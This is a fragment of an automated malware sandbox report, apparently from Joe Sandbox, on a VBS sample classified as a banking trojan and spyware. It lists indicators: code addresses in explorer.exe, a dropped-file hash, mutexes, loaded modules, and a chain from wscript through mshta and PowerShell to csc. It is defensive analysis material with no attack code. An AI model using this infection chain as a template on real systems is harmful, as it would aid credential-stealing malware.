            Source: C:\Windows\explorer.exeCode function: 31_2_04E0E08031_2_04E0E080
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0606431_2_04E06064
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFB04031_2_04DFB040
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE203C31_2_04DE203C
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0F94031_2_04E0F940
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF117431_2_04DF1174
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0822431_2_04E08224
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0320831_2_04E03208
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE2BC831_2_04DE2BC8
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF938031_2_04DF9380
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE8B5C31_2_04DE8B5C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF8B4C31_2_04DF8B4C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE732031_2_04DE7320
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
            Source: 6znkPyTAVN7V.vbsInitial sample: Strings found which are bigger than 50
            Source: dvgqxizg.dll.29.drStatic PE information: No import functions for PE file found
            Source: 41myt1z4.dll.26.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptdlg.dll
            Source: C:\Windows\explorer.exeSection loaded: msoert2.dll
            Source: C:\Windows\explorer.exeSection loaded: msimg32.dll
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winVBS@28/41@11/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{051BC4BB-2B60-11EB-90E5-ECF4BB2D2496}.datJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{CE3E3C9F-D537-30A7-CFE2-D96473361DD8}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{5681524C-BDC8-F872-F7EA-41AC1BBE05A0}
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6znkPyTAVN7V.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll